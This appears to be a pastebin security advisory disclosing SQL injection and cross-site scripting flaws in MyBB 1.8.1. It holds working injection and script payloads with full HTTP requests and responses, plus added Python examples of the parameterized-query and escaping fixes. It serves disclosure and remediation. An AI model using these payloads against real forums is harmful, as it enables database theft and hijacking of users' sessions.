Untitled

a guest Nov 13th, 2014 529 Never
  1. #Title: MyBB 1.8.X - Multiple Vulnerabilities
  2. #Date: 13.11.2014
  3. #Tested on: Linux / Apache 2.2 / PHP 5 (localhost)
  4. #Vendor: mybb.com
  5. #Version:  => 1.8.1 - Latest ATM
  6. #Contact: smash@devilteam.pl
  7. #Author: Smash_
  8.  
  9.  
  10. The latest MyBB forum software suffers from multiple vulnerabilities, including SQL injection and cross-site scripting. Such bugs may allow an attacker to run SQL queries against the database remotely, and so on.
  11.  
  12. Sanitize your inputs ;)
  13.  
  14.  
  15. 1. SQL Injection
  16.  
  17. Vuln:
  18. POST 'question_id' - ID'+or+1+group+by+concat_ws(0x3a,database(),floor(rand(0)*2))+having+min(0)+or+1#
  19.  
  20. #1 - Request (question_id=C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+9#):
  21. POST /mybb-1.8.1/member.php HTTP/1.1
  22. Host: localhost
  23. Content-Type: application/x-www-form-urlencoded
  24. Content-Length: 408
  25.  
  26. regcheck1=&regcheck2=true&username=woot&password=random&password2=random&email=woot%40woot.com&email2=woot%40woot.com&referrername=&imagestring=6cj5n&imagehash=b2dee8e4028e9cad37e30c31753dfe01&answer=4&question_id=C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+9#&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1415880544&step=registration&action=do_register
  27.  
  28. #1 - Response:
  29. HTTP/1.1 503 Service Temporarily Unavailable
  30. Date: Thu, 13 Nov 2014 15:16:02 GMT
  31.                 <div id="content">
  32.                         <h2>MyBB SQL Error</h2>
  33.  
  34.                         <div id="error">
  35.                                 <p>MyBB has experienced an internal SQL error and cannot continue.</p><dl>
  36. <dt>SQL Error:</dt>
  37. <dd>1054 - Unknown column '9' in 'order clause'</dd>
  38. <dt>Query:</dt>
  39.                         SELECT q.*, s.sid
  40.                         FROM mybb_questionsessions s
  41.                         LEFT JOIN mybb_questions q ON (q.qid=s.qid)
  42.                         WHERE q.active='1' AND s.sid='C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om' ORDER BY 9#'
  43.                 </dd>
  44.  
  45.  
  46. #2 - Request (question_id=-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+8#):
  47. POST /mybb-1.8.1/member.php HTTP/1.1
  48. Host: localhost
  49. Content-Type: application/x-www-form-urlencoded
  50. Content-Length: 409
  51.  
  52. regcheck1=&regcheck2=true&username=woot&password=random&password2=random&email=woot%40woot.com&email2=woot%40woot.com&referrername=&imagestring=6cj5n&imagehash=b2dee8e4028e9cad37e30c31753dfe01&answer=4&question_id=-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+ORDER+BY+8#&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1415880544&step=registration&action=do_register
  53.  
  54. #2 - Response:
  55. HTTP/1.1 200 OK
  56. Date: Thu, 13 Nov 2014 15:21:15 GMT
  57. (...)
  58. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!-- start: member_register -->
  59. <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
  60. <head>
  61. <title>Forums - Registration</title>
  62.  
  63.  
  64. #3 - Request (Final POC):
  65. POST /mybb-1.8.1/member.php HTTP/1.1
  66. Host: localhost
  67. Content-Type: application/x-www-form-urlencoded
  68. Content-Length: 475
  69.  
  70. regcheck1=&regcheck2=true&username=woot&password=random&password2=random&email=woot%40woot.com&email2=woot%40woot.com&referrername=&imagestring=6cj5n&imagehash=b2dee8e4028e9cad37e30c31753dfe01&answer=4&question_id=-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om'+or+1+group+by+concat_ws(0x3a,database(),floor(rand(0)*2))+having+min(0)+or+1#&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1415880544&step=registration&action=do_register
  71.  
  72. #3 - Response:
  73. HTTP/1.1 503 Service Temporarily Unavailable
  74. Date: Thu, 13 Nov 2014 15:24:34 GMT
  75. (...)
  76.                 <div id="content">
  77.                         <h2>MyBB SQL Error</h2>
  78.  
  79.                         <div id="error">
  80.                                 <p>MyBB has experienced an internal SQL error and cannot continue.</p><dl>
  81. <dt>SQL Error:</dt>
  82. <dd>1062 - Duplicate entry 'mybb:1' for key 'group_key'</dd>
  83. <dt>Query:</dt>
  84. <dd>
  85.                         SELECT q.*, s.sid
  86.                         FROM mybb_questionsessions s
  87.                         LEFT JOIN mybb_questions q ON (q.qid=s.qid)
  88.                         WHERE q.active='1' AND s.sid='-C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om' or 1 group by concat_ws(0x3a,database(),floor(rand(0)*2)) having min(0) or 1#'
  89.                 </dd>
  90. </dl>
  91. (...)
  92.  
  93.  
  94.  
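The root cause behind the three requests above, and the fix, as an added example (not MyBB's code and not from the advisory's author): one lookup builds the question-session query by string concatenation, the other checks the value's shape and binds it as a parameter. SQLite stands in for MySQL here, and `make_db`, `lookup_concatenated`, `lookup_bound`, `outcome` and the 32-character `SID_RE` pattern are assumptions made for illustration; the table names, query text and probe value are the ones shown in the error output.

```python
import re
import sqlite3

# Query text as it appears in the "MyBB SQL Error" output, minus the sid value.
BASE = ("SELECT q.*, s.sid FROM mybb_questionsessions s "
        "LEFT JOIN mybb_questions q ON (q.qid=s.qid) "
        "WHERE q.active='1' AND s.sid=")

# Assumption: a session id looks like the 32-character value in the requests.
SID_RE = re.compile(r"[A-Za-z0-9]{32}")

GOOD_SID = "C3yp9eM4wWlk1krjwiyxaXwqnCH9W8Om"
PROBE = GOOD_SID + "' ORDER BY 9#"   # request #1 from the advisory, URL-decoded


def make_db():
    """Constructed in-memory stand-in for the two tables named in the query."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE mybb_questions (qid INTEGER PRIMARY KEY, active TEXT);"
        "CREATE TABLE mybb_questionsessions (sid TEXT PRIMARY KEY, qid INTEGER);"
        "INSERT INTO mybb_questions VALUES (1, '1');"
        "INSERT INTO mybb_questionsessions VALUES ('%s', 1);" % GOOD_SID
    )
    return db


def lookup_concatenated(db, question_id):
    # Vulnerable pattern: a quote in the value ends the string literal, and
    # whatever follows is parsed as part of the statement.
    return db.execute(BASE + "'" + question_id + "'").fetchall()


def lookup_bound(db, question_id):
    # Hardened pattern: allowlist the shape, then pass the value as a bound
    # parameter so it can never be parsed as SQL.
    if not SID_RE.fullmatch(question_id):
        return []
    return db.execute(BASE + "?", (question_id,)).fetchall()


def outcome(lookup, db, question_id):
    """Row count, or 'sql-error' when the value altered the statement."""
    try:
        return len(lookup(db, question_id))
    except sqlite3.OperationalError:
        return "sql-error"
```

With concatenation the probe reaches the SQL parser and raises an error, as in response #1; with binding it is compared as an ordinary string and matches no row.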
  95. 2. Cross Site Scripting
  96.  
  97.  a) Reflected XSS - Report post
  98.  
  99. Vuln:
  100. GET 'type' - XSS"><script>alert(666)</script>
  101.  
  102. localhost/mybb-1.8.1/report.php?type=XSS%22%3E%3Cscript%3Ealert%28666%29%3C%2fscript%3E&pid=1
  103.  
  104. Request:
  105. GET /mybb-1.8.1/report.php?type=XSS%22%3E%3Cscript%3Ealert%28666%29%3C%2fscript%3E&pid=1 HTTP/1.1
  106. Host: localhost
  107.  
  108. Response:
  109. HTTP/1.1 200 OK
  110. Set-Cookie: sid=27ec1f0b75b3c6b9d852e6614144a452; path=/mybb-1.8.1/; HttpOnly
  111. Content-Length: 1247
  112. Content-Type: text/html
  113.  
  114. <div class="modal">
  115.   <div style="overflow-y: auto; max-height: 400px;" class="modal_0">
  116.   <form action="report.php" method="post" class="reportData_0" onsubmit="javascript: return Report.submitReport(0);">
  117. <input type="hidden" name="my_post_key" value="c08308117fcadae6609372f46fa97835" />
  118. <input type="hidden" name="action" value="do_report" />
  119. <input type="hidden" name="type" value="XSS"><script>alert(666)</script>" />
  120. <input type="hidden" name="pid" value="0" />
  121.  
  122.  
  123.  b) Stored XSS - Signature
  124.  
  125. Vuln:
  126. POST 'signature' - [video=youtube]http://youtube.com?"+xss="true"+666="[/video]
  127.  
  128. #1 - Request (change signature):
  129. POST /mybb-1.8.1/usercp.php HTTP/1.1
  130. Host: localhost
  131. Referer: http://localhost/mybb-1.8.1/usercp.php?action=editsig
  132. Content-Type: application/x-www-form-urlencoded
  133. Content-Length: 203
  134.  
  135. my_post_key=c08308117fcadae6609372f46fa97835&signature=%5Bvideo%3Dyoutube%5Dhttp%3A%2F%2Fyoutube.com%3F%22+xss%3D%22true%22+666%3D%22%5B%2Fvideo%5D&updateposts=0&action=do_editsig&submit=Update+Signature
  136.  
  137. #2 - Request (user's profile):
  138. GET /mybb-1.8.1/member.php?action=profile&uid=2 HTTP/1.1
  139. Host: localhost
  140. Referer: http://localhost/mybb-1.8.1/usercp.php?action=editsig
  141.  
  142. #2 - Response:
  143. HTTP/1.1 200 OK
  144. Set-Cookie: sid=e68f1b6fab0737d7057b546e24d8106e; path=/mybb-1.8.1/; HttpOnly
  145. Content-Length: 12740
  146. Content-Type: text/html; charset=UTF-8
  147. (...)
  148. <table border="0" cellspacing="0" cellpadding="5" class="tborder tfixed">
  149. <tr>
  150. <td class="thead"><strong>user's Signature</strong></td>
  151. </tr>
  152. <tr>
  153. <td class="trow1 scaleimages">[Video: <a href="http://youtube.com?" xss="true" 666="" target="_blank">http://youtube.com?" xss="true" 666="</a>]</td>
  154. </tr>
  155. </table>
  156. <br />
  157.  
  158.  
  159.  c) Reflected XSS - Templates (AP)
  160.  
  161. Vuln:
  162. GET 'title' - title"><script>alert(666)</script>
  163.  
  164. localhost/mybb-1.8.1/admin/index.php?module=style-templates&action=edit_template&title=calendar"><script>alert(666)</script>&sid=1&expand=1
  165.  
  166. Request:
  167. GET /mybb-1.8.1/admin/index.php?module=style-templates&action=edit_template&title=calendar%22%3E%3Cscript%3Ealert(666)%3C/script%3E&sid=1&expand=1 HTTP/1.1
  168. Host: localhost
  169.  
  170. Response:
  171. HTTP/1.1 200 OK
  172. (...)
  173. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  174. <html xmlns="http://www.w3.org/1999/xhtml">
  175. <head profile="http://gmpg.org/xfn/1">
  176.         <title>Editing Template: calendar"><script>alert(666)</script></title>
  177.  
  178.  
  179.  d) Reflected XSS - Languages (AP)
  180.  
  181. Vuln:
  182. GET 'file' - <a onmouseover=alert(666)>woot
  183.  
  184. localhost/mybb-1.8.1/admin/index.php?module=config-languages&action=edit&lang=english&editwith=&file=<a onmouseover=alert(666)>woot
  185.  
  186. Request:
  187. GET /mybb-1.8.1/admin/index.php?module=config-languages&action=edit&lang=english&editwith=&file=%3Ca%20onmouseover=alert(666)%3Ewoot HTTP/1.1
  188. Host: localhost
  189.  
  190. Response:
  191. HTTP/1.1 200 OK
  192. (...)
  193. <a href="index.php?module=config-languages">Languages</a> &raquo; <a href="index.php?module=config-languages&amp;action=edit&amp;lang=english">English (American)</a> &raquo; <span class="active"><a onmouseover=alert(666)>woot</span>
  194. (...)
  195. <div class="title"><a onmouseover=alert(666)>woot</div>
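What the missing output encoding in cases a), b) and d) does to the markup, and what entity encoding changes, as an added example (not MyBB's code and not from the advisory's author). The templates and sample values are copied from the responses and requests above; `SINKS`, `SAMPLES`, `TagCollector`, `render` and `seen_by_parser` are names assumed for illustration.

```python
from html import escape
from html.parser import HTMLParser

# Output templates copied from responses 2a, 2b and 2d above.
SINKS = {
    "report": '<input type="hidden" name="type" value="{0}" />',
    "signature": '[Video: <a href="{0}" target="_blank">{0}</a>]',
    "language": '<span class="active">{0}</span>',
}

# Values taken from the requests on this page, URL-decoded.
SAMPLES = {
    "report": 'XSS"><script>alert(666)</script>',
    "signature": 'http://youtube.com?" xss="true" 666="',
    "language": '<a onmouseover=alert(666)>woot',
}


class TagCollector(HTMLParser):
    """Records each start tag with its attributes, as an HTML parser sees them."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def render(sink, value, encode):
    # encode=False reproduces the responses above; encode=True applies
    # HTML entity encoding (&, <, >, " and ') before the value is written out.
    if encode:
        value = escape(value, quote=True)
    return SINKS[sink].format(value)


def seen_by_parser(sink, value, encode):
    """Return [(tag, attrs)] for the rendered markup."""
    collector = TagCollector()
    collector.feed(render(sink, value, encode))
    collector.close()
    return collector.tags
```

Encoded, each value stays inside the one attribute or text node it was written to. A URL sink such as the `[video]` link also needs its scheme validated, which encoding alone does not do.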